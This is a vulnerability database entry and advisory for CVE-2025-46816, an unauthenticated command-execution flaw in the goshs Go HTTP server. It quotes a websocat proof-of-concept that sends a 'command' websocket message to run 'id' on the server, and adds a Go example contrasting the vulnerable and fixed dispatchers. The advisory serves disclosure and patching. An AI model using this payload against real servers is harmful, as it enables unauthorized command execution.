CVE-2025-46816
Published 2025-05-06
Priority: P2 (61) · Severity: critical 9.4 (CVSS 3.0)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
EPSS: 0.60% (44.5th percentile)
goshs is a SimpleHTTPServer written in Go. Starting in version 0.3.4 and prior to version 1.0.5, running goshs without arguments makes it possible for anyone to execute commands on the server. The function `dispatchReadPump` does not check the `-c` CLI option, thus allowing anyone to execute arbitrary commands through the use of websockets. Version 1.0.5 fixes the issue.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | patrickhener_goshs | >= 0.3.4 < 1.0.5 | 1.0.5 |
| patrickhener | goshs | — | — |
OSV
osv·2025-05-15
CVE-2025-46816 goshs route not protected, allows command execution in github.com/patrickhener/goshs
OSV
osv·2025-05-06
CVE-2025-46816 [CRITICAL] goshs route not protected, allows command execution
### Summary
It seems that when running **goshs** without arguments it is possible for anyone to execute commands on the server. This was tested on version **1.0.4** of **goshs**. The command function was introduced in version **0.3.4**.
### Details
It seems that the function ```dispatchReadPump``` does not check the CLI option ```-c```, thus allowing anyone to execute arbitrary commands through the use of websockets.
### PoC
Used **websocat** for the POC:
```bash
# Send one text-mode websocket frame carrying the "command" message to the
# goshs websocket endpoint; the server runs `id` and returns the output.
echo -e '{"type": "command", "content": "id"}' | ./websocat 'ws://192.168.1.11:8000/?ws' -t
```
### Impact
The vulnerability will only impact goshs servers on vulnerable versions.
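The bug class described above is a missing authorization gate on one websocket message type: the dispatcher reaches the command branch whether or not the operator opted in with `-c`. The following Go example is an added illustration of that gate and is not goshs's own code; the JSON field names (`type`, `content`) are taken from the PoC, while the `Server` type, the `CommandsEnabled` field, the `dispatchVulnerable` / `dispatchFixed` functions and the use of `sh -c` to run the command are assumptions made for this example. It shows the vulnerable shape beside the fixed one and lets you run the PoC payload against both offline.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"os/exec"
	"strings"
)

// wsMessage mirrors the JSON the PoC sends: {"type": "command", "content": "id"}.
// The field names come from the PoC; the struct is an assumption for this
// example, not goshs's own type.
type wsMessage struct {
	Type    string `json:"type"`
	Content string `json:"content"`
}

// Server holds the one piece of state that matters for this bug: whether the
// operator started the server with the -c (command execution) option.
// Assumed name and layout, not goshs internals.
type Server struct {
	CommandsEnabled bool // true only when the operator passed -c
}

var (
	ErrCommandsDisabled = errors.New("command execution not enabled (-c not set)")
	ErrUnknownType      = errors.New("unknown message type")
)

// dispatchVulnerable models the advisory's bug: the "command" branch never
// consults CommandsEnabled, so any websocket client can run a command.
// Illustrative reconstruction of the behaviour, not goshs code.
func (s *Server) dispatchVulnerable(raw []byte) (string, error) {
	var m wsMessage
	if err := json.Unmarshal(raw, &m); err != nil {
		return "", err
	}
	switch m.Type {
	case "command":
		return runCommand(m.Content) // no check of the -c option
	default:
		return "", ErrUnknownType
	}
}

// dispatchFixed gates the command branch on the option before anything is
// executed, which is the shape of fix the advisory describes.
func (s *Server) dispatchFixed(raw []byte) (string, error) {
	var m wsMessage
	if err := json.Unmarshal(raw, &m); err != nil {
		return "", err
	}
	switch m.Type {
	case "command":
		if !s.CommandsEnabled {
			return "", ErrCommandsDisabled
		}
		return runCommand(m.Content)
	default:
		return "", ErrUnknownType
	}
}

// runCommand executes the payload through the shell. Using `sh -c` is an
// assumption for this example; whatever goshs actually does, the point is
// that it is reachable without the -c gate in the vulnerable dispatcher.
func runCommand(cmdline string) (string, error) {
	out, err := exec.Command("sh", "-c", cmdline).CombinedOutput()
	return strings.TrimSpace(string(out)), err
}

func main() {
	// Constructed payload in the same shape as the PoC message.
	payload := []byte(`{"type": "command", "content": "echo pwned"}`)
	srv := &Server{CommandsEnabled: false} // started "without arguments"

	out, err := srv.dispatchVulnerable(payload)
	fmt.Printf("vulnerable: out=%q err=%v\n", out, err)

	out, err = srv.dispatchFixed(payload)
	fmt.Printf("fixed:      out=%q err=%v\n", out, err)
}
```

With `CommandsEnabled` false, the vulnerable dispatcher still returns the command output while the fixed one refuses with `ErrCommandsDisabled`; flipping the flag (the equivalent of passing `-c`) makes both behave the same, which is why the bug is invisible to an operator who always runs with `-c`.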
GHSA
goshs route not protected, allows command execution
ghsa·2025-05-06
CVE-2025-46816 [CRITICAL] CWE-284 goshs route not protected, allows command execution
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
Published: 2025-05-06